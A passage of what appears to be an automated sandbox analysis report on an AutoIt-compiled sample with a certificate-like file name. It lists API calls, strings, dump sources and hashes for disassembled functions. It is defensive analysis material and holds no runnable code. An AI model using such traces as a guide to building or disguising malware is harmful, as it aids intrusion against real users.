                                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,008CD9BC,00000000), ref: 0089A5B9
                                                                                • GlobalFree.KERNEL32(00000000), ref: 0089A5C9
                                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0089A5EF
                                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0089A60E
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A630
                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A81D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                • API String ID: 2211948467-2373415609
                                                                                • Opcode ID: e285dbff8416e99425fde8f45a0b7f040a67c88757b71921c37cb1f851aa21b4
                                                                                • Instruction ID: 3ff3cdfeb1ff0a1cdd8d00afc8d5994b5a97acac829dda28ef4d7890ab8d5367
                                                                                • Opcode Fuzzy Hash: e285dbff8416e99425fde8f45a0b7f040a67c88757b71921c37cb1f851aa21b4
                                                                                • Instruction Fuzzy Hash: E6025271500218EFDB14EFA4CD89EAE7BB9FB48710F048158F915EB2A1D770AD41CBA1
                                                                                APIs
                                                                                • SetTextColor.GDI32(?,00000000), ref: 008AD2DB
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 008AD30C
                                                                                • GetSysColor.USER32(0000000F), ref: 008AD318
                                                                                • SetBkColor.GDI32(?,000000FF), ref: 008AD332
                                                                                • SelectObject.GDI32(?,00000000), ref: 008AD341
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 008AD36C
                                                                                • GetSysColor.USER32(00000010), ref: 008AD374
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 008AD37B
                                                                                • FrameRect.USER32(?,?,00000000), ref: 008AD38A
                                                                                • DeleteObject.GDI32(00000000), ref: 008AD391
                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 008AD3DC
                                                                                • FillRect.USER32(?,?,00000000), ref: 008AD40E
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 008AD439
                                                                                  • Part of subcall function 008AD575: GetSysColor.USER32(00000012), ref: 008AD5AE
                                                                                  • Part of subcall function 008AD575: SetTextColor.GDI32(?,?), ref: 008AD5B2
                                                                                  • Part of subcall function 008AD575: GetSysColorBrush.USER32(0000000F), ref: 008AD5C8
                                                                                  • Part of subcall function 008AD575: GetSysColor.USER32(0000000F), ref: 008AD5D3
                                                                                  • Part of subcall function 008AD575: GetSysColor.USER32(00000011), ref: 008AD5F0
                                                                                  • Part of subcall function 008AD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 008AD5FE
                                                                                  • Part of subcall function 008AD575: SelectObject.GDI32(?,00000000), ref: 008AD60F
                                                                                  • Part of subcall function 008AD575: SetBkColor.GDI32(?,00000000), ref: 008AD618
                                                                                  • Part of subcall function 008AD575: SelectObject.GDI32(?,?), ref: 008AD625
                                                                                  • Part of subcall function 008AD575: InflateRect.USER32(?,000000FF,000000FF), ref: 008AD644
                                                                                  • Part of subcall function 008AD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008AD65B
                                                                                  • Part of subcall function 008AD575: GetWindowLongW.USER32(00000000,000000F0), ref: 008AD670
                                                                                  • Part of subcall function 008AD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008AD698
                                                                                Similarity
                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 3521893082-0
                                                                                • Opcode ID: 762988f8cd7a5249dfafe127057913954b2a73537677d884c9730099c5056748
                                                                                • Instruction ID: 73c624ebe3ccbe70823cce8b489822eb43551f5c39632b0a7c035c78dbaca3d1
                                                                                • Opcode Fuzzy Hash: 762988f8cd7a5249dfafe127057913954b2a73537677d884c9730099c5056748
                                                                                • Instruction Fuzzy Hash: 4D917C72408305FFDB10AF64DC08E6BBBB9FB89325F101A29F962D65A0D771E944CB52
                                                                                APIs
                                                                                • DestroyWindow.USER32 ref: 0085B98B
                                                                                • DeleteObject.GDI32(00000000), ref: 0085B9CD
                                                                                • DeleteObject.GDI32(00000000), ref: 0085B9D8
                                                                                • DestroyIcon.USER32(00000000), ref: 0085B9E3
                                                                                • DestroyWindow.USER32(00000000), ref: 0085B9EE
                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 008BD2AA
                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 008BD2E3
                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 008BD711
                                                                                  • Part of subcall function 0085B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0085B759,?,00000000,?,?,?,?,0085B72B,00000000,?), ref: 0085BA58
                                                                                • SendMessageW.USER32 ref: 008BD758
                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 008BD76F
                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 008BD785
                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 008BD790
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                • String ID: 0
                                                                                • API String ID: 464785882-4108050209
                                                                                • Opcode ID: f4081b43df466315cdace13d2bf5b35b087fde687d6d67ccc0bf554e5b845863
                                                                                • Instruction ID: e90cbda89065caee81ee7fa46fe5d06dd6c6ad35cd3b13666c997b4e31a0eefa
                                                                                • Opcode Fuzzy Hash: f4081b43df466315cdace13d2bf5b35b087fde687d6d67ccc0bf554e5b845863
                                                                                • Instruction Fuzzy Hash: 97128A70204701AFDB21DF28C884BA9BBF5FF19305F144569F989CB662EB31E845CB92
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0088DBD6
                                                                                • GetDriveTypeW.KERNEL32(?,008DDC54,?,\\.\,008DDC00), ref: 0088DCC3
                                                                                • SetErrorMode.KERNEL32(00000000,008DDC54,?,\\.\,008DDC00), ref: 0088DE29
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ErrorMode$DriveType
                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                • API String ID: 2907320926-4222207086
                                                                                • Opcode ID: fb2a659a87608f4f2f14272d15b796b39912cc64e2f50b71fad8b01610a20830
                                                                                • Instruction ID: 84c08165cfa374512e89656260692bf61b3374dc688e3f112cc1fbc56949fb92
                                                                                • Opcode Fuzzy Hash: fb2a659a87608f4f2f14272d15b796b39912cc64e2f50b71fad8b01610a20830
                                                                                • Instruction Fuzzy Hash: 8D51B03024830AABC610FF25C892839B7A1FFA4719F20591AF567DB3E1DB74DA45DB42
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: __wcsnicmp
                                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                • API String ID: 1038674560-86951937
                                                                                • Opcode ID: bff9339b49b8dae7d421430c1f32307bb615f86374f6e0cd17c8ba802166dbc7
                                                                                • Instruction ID: 401166506851c1fedf207aebe5cb5003b90366f6c9a04e7e1ab311e2bd44f5cf
                                                                                • Opcode Fuzzy Hash: bff9339b49b8dae7d421430c1f32307bb615f86374f6e0cd17c8ba802166dbc7
                                                                                • Instruction Fuzzy Hash: 8881E53064130DABCB61AA68CC82FBA776DFF24304F044039F905EB387EB61D945C696
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?,008DDC00), ref: 008A6449
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                • API String ID: 3964851224-45149045
                                                                                • Opcode ID: f394dfa41449bd7847533303dfab1390f2fb0cf630848f07f28d31fead4ddcd3
                                                                                • Instruction ID: 7d9e07ca281953bce8013e48964db9ac8e61a160bfca502ef2546815981a2e8d
                                                                                • Opcode Fuzzy Hash: f394dfa41449bd7847533303dfab1390f2fb0cf630848f07f28d31fead4ddcd3
                                                                                • Instruction Fuzzy Hash: 59C1C4302142198BDB04EF18C451A6E77A5FF96344F084869F986DB7A6EB30ED1ECB43
                                                                                APIs
                                                                                • GetSysColor.USER32(00000012), ref: 008AD5AE
                                                                                • SetTextColor.GDI32(?,?), ref: 008AD5B2
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 008AD5C8
                                                                                • GetSysColor.USER32(0000000F), ref: 008AD5D3
                                                                                • CreateSolidBrush.GDI32(?), ref: 008AD5D8
                                                                                • GetSysColor.USER32(00000011), ref: 008AD5F0
                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 008AD5FE
                                                                                • SelectObject.GDI32(?,00000000), ref: 008AD60F
                                                                                • SetBkColor.GDI32(?,00000000), ref: 008AD618
                                                                                • SelectObject.GDI32(?,?), ref: 008AD625
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 008AD644
                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008AD65B
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 008AD670
                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008AD698
                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 008AD6BF
                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 008AD6DD
                                                                                • DrawFocusRect.USER32(?,?), ref: 008AD6E8
                                                                                • GetSysColor.USER32(00000011), ref: 008AD6F6
                                                                                • SetTextColor.GDI32(?,00000000), ref: 008AD6FE
                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 008AD712
                                                                                • SelectObject.GDI32(?,008AD2A5), ref: 008AD729
                                                                                • DeleteObject.GDI32(?), ref: 008AD734
                                                                                • SelectObject.GDI32(?,?), ref: 008AD73A
                                                                                • DeleteObject.GDI32(?), ref: 008AD73F
                                                                                • SetTextColor.GDI32(?,?), ref: 008AD745
                                                                                • SetBkColor.GDI32(?,?), ref: 008AD74F
                                                                                Similarity
                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 1996641542-0
                                                                                • Opcode ID: c5ee6464d04c03eeb9b1d91df326a8982f388411d66ed4e2c731fd4e858f4801
                                                                                • Instruction ID: 68265797027bceab2f7ca9d5ba5543d362efc0f117696283f6d98c067f703eaf
                                                                                • Opcode Fuzzy Hash: c5ee6464d04c03eeb9b1d91df326a8982f388411d66ed4e2c731fd4e858f4801
                                                                                • Instruction Fuzzy Hash: CD513F72900208EFDF10AFA4DC48EAEBB79FB09324F144525F915EB2A1D7719940CF50
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 008AB7B0
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008AB7C1
                                                                                • CharNextW.USER32(0000014E), ref: 008AB7F0
                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 008AB831
                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 008AB847
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008AB858
                                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 008AB875
                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 008AB8C7
                                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 008AB8DD
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 008AB90E
                                                                                • _memset.LIBCMT ref: 008AB933
                                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 008AB97C
                                                                                • _memset.LIBCMT ref: 008AB9DB
                                                                                • SendMessageW.USER32 ref: 008ABA05
                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 008ABA5D
                                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 008ABB0A
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 008ABB2C
                                                                                • GetMenuItemInfoW.USER32(?), ref: 008ABB76
                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008ABBA3
                                                                                • DrawMenuBar.USER32(?), ref: 008ABBB2
                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 008ABBDA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                • String ID: 0
                                                                                • API String ID: 1073566785-4108050209
                                                                                • Opcode ID: 0ad59e19786a6181427c40a41900e8dc1d8033e7f33962bc58c0f0f52e2c3541
                                                                                • Instruction ID: 9dbe93dc8069d4a90f0a048fa0703220f41a79f8788279fb2b6b7628d960c09c
                                                                                • Opcode Fuzzy Hash: 0ad59e19786a6181427c40a41900e8dc1d8033e7f33962bc58c0f0f52e2c3541
                                                                                • Instruction Fuzzy Hash: 86E1AE70900208AFEB209F65CC84EEE7B78FF06714F108166F959EA592DBB48A41DF61
                                                                                APIs
                                                                                • GetCursorPos.USER32(?), ref: 008A778A
                                                                                • GetDesktopWindow.USER32 ref: 008A779F
                                                                                • GetWindowRect.USER32(00000000), ref: 008A77A6
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 008A7808
                                                                                • DestroyWindow.USER32(?), ref: 008A7834
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008A785D
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008A787B
                                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 008A78A1
                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 008A78B6
                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 008A78C9
                                                                                • IsWindowVisible.USER32(?), ref: 008A78E9
                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 008A7904
                                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 008A7918
                                                                                • GetWindowRect.USER32(?,?), ref: 008A7930
                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 008A7956
                                                                                • GetMonitorInfoW.USER32 ref: 008A7970
                                                                                • CopyRect.USER32(?,?), ref: 008A7987
                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 008A79F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                • String ID: ($0$tooltips_class32
                                                                                • API String ID: 698492251-4156429822
                                                                                • Opcode ID: 782c9d775a3bb60f58059b8bb9a5216c0011dc0f44456eb076ef1a558efd4a17
                                                                                • Instruction ID: 9280b119755eb0d740ade846ca3335fb793ecab29a58595bd340adb5c0686d5c
                                                                                • Opcode Fuzzy Hash: 782c9d775a3bb60f58059b8bb9a5216c0011dc0f44456eb076ef1a558efd4a17
                                                                                • Instruction Fuzzy Hash: 11B18071608300AFEB04DF68C948B6ABBE4FF89310F00892DF599DB291D774E804DB96
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0085A939
                                                                                • GetSystemMetrics.USER32(00000007), ref: 0085A941
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0085A96C
                                                                                • GetSystemMetrics.USER32(00000008), ref: 0085A974
                                                                                • GetSystemMetrics.USER32(00000004), ref: 0085A999
                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0085A9B6
                                                                                • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0085A9C6
                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0085A9F9
                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0085AA0D
                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 0085AA2B
                                                                                • GetStockObject.GDI32(00000011), ref: 0085AA47
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0085AA52
                                                                                  • Part of subcall function 0085B63C: GetCursorPos.USER32(000000FF), ref: 0085B64F
                                                                                  • Part of subcall function 0085B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0085B66C
                                                                                  • Part of subcall function 0085B63C: GetAsyncKeyState.USER32(00000001), ref: 0085B691
                                                                                  • Part of subcall function 0085B63C: GetAsyncKeyState.USER32(00000002), ref: 0085B69F
                                                                                • SetTimer.USER32(00000000,00000000,00000028,0085AB87), ref: 0085AA79
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                • String ID: AutoIt v3 GUI$MZER
                                                                                • API String ID: 1458621304-3817250719
                                                                                • Opcode ID: a60f6e6a4af2a4202e6b64feb2884d42050c59dbfb80e67c45ef462e885e2509
                                                                                • Instruction ID: 415b511f016e175bac7c0d9f3461ff44ed5f2b901580a47a9c9d3c70782caba6
                                                                                • Opcode Fuzzy Hash: a60f6e6a4af2a4202e6b64feb2884d42050c59dbfb80e67c45ef462e885e2509
                                                                                • Instruction Fuzzy Hash: 23B12771A0021AAFDB18DFA8DC85BEE7BB4FB08315F154229FA15E7290DB74E841CB51
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Foreground
                                                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                • API String ID: 62970417-1919597938
                                                                                • Opcode ID: 0ef583820432fd4479662bb096b3668d50beb023ea2886106ce77c427fa519a6
                                                                                • Instruction ID: c5288dc3d7389df1397422125fa1c0d38ca6ebaded27bc6794eb6c535c6a7498
                                                                                • Opcode Fuzzy Hash: 0ef583820432fd4479662bb096b3668d50beb023ea2886106ce77c427fa519a6
                                                                                • Instruction Fuzzy Hash: F8D1C53010874A9BCB14EF68C8819EAFBB0FF54344F504A19F455D73A1DB30E95ACB92
                                                                                APIs
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008A3735
                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,008DDC00,00000000,?,00000000,?,?), ref: 008A37A3
                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 008A37EB
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 008A3874
                                                                                • RegCloseKey.ADVAPI32(?), ref: 008A3B94
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 008A3BA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                • API String ID: 536824911-966354055
                                                                                • Opcode ID: dfbe37e8c038867913a11a2a54963d7fc7a3a1401c3b93ad1a34144140d17d37
                                                                                • Instruction ID: 5e0adeab153d83b0e81ed6d9571f52e48906bb5bd4a065242a9f06eaff4f773c
                                                                                • Opcode Fuzzy Hash: dfbe37e8c038867913a11a2a54963d7fc7a3a1401c3b93ad1a34144140d17d37
                                                                                • Instruction Fuzzy Hash: FE024A756046059FDB24EF28C851A2AB7E5FF89720F04845DF99ADB3A1CB34ED01CB86
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 008A6C56
                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 008A6D16
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharMessageSendUpper
                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                • API String ID: 3974292440-719923060
                                                                                • Opcode ID: 87c3a63e4a92e1e7ffa4a897084ce6fd9a02d9b530a45c2d3ac2330f85dcaedd
                                                                                • Instruction ID: 1f5391a6ca5216c787bdc9d13f95d210d2600be7617f8372616d8275b04f75fb
                                                                                • Opcode Fuzzy Hash: 87c3a63e4a92e1e7ffa4a897084ce6fd9a02d9b530a45c2d3ac2330f85dcaedd
                                                                                • Instruction Fuzzy Hash: 10A1BF302043499FDB14EF28C841A6AB3A1FF45314F188969B996DB7D6EF70ED19CB42
                                                                                APIs
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0087CF91
                                                                                • __swprintf.LIBCMT ref: 0087D032
                                                                                • _wcscmp.LIBCMT ref: 0087D045
                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0087D09A
                                                                                • _wcscmp.LIBCMT ref: 0087D0D6
                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0087D10D
                                                                                • GetDlgCtrlID.USER32(?), ref: 0087D15F
                                                                                • GetWindowRect.USER32(?,?), ref: 0087D195
                                                                                • GetParent.USER32(?), ref: 0087D1B3
                                                                                • ScreenToClient.USER32(00000000), ref: 0087D1BA
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0087D234
                                                                                • _wcscmp.LIBCMT ref: 0087D248
                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0087D26E
                                                                                • _wcscmp.LIBCMT ref: 0087D282
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                • String ID: %s%u
                                                                                • API String ID: 3119225716-679674701
                                                                                • Opcode ID: b9298ce0a5857762225e9f1b8ac85bd576a4d6df6dfda3a6906e5756cc68d327
                                                                                • Instruction ID: 143321a8c02e46f5fab894f1a67e3487e2a7eec661c2ff72dae7361098dfacb1
                                                                                • Opcode Fuzzy Hash: b9298ce0a5857762225e9f1b8ac85bd576a4d6df6dfda3a6906e5756cc68d327
                                                                                • Instruction Fuzzy Hash: C3A1BE71204706ABD714EF64C884FAAF7A8FF44314F008529F99ED3195EB30E946CBA1
                                                                                APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 0087D8EB
• _wcscmp.LIBCMT ref: 0087D8FC
• GetWindowTextW.USER32(00000001,?,00000400), ref: 0087D924
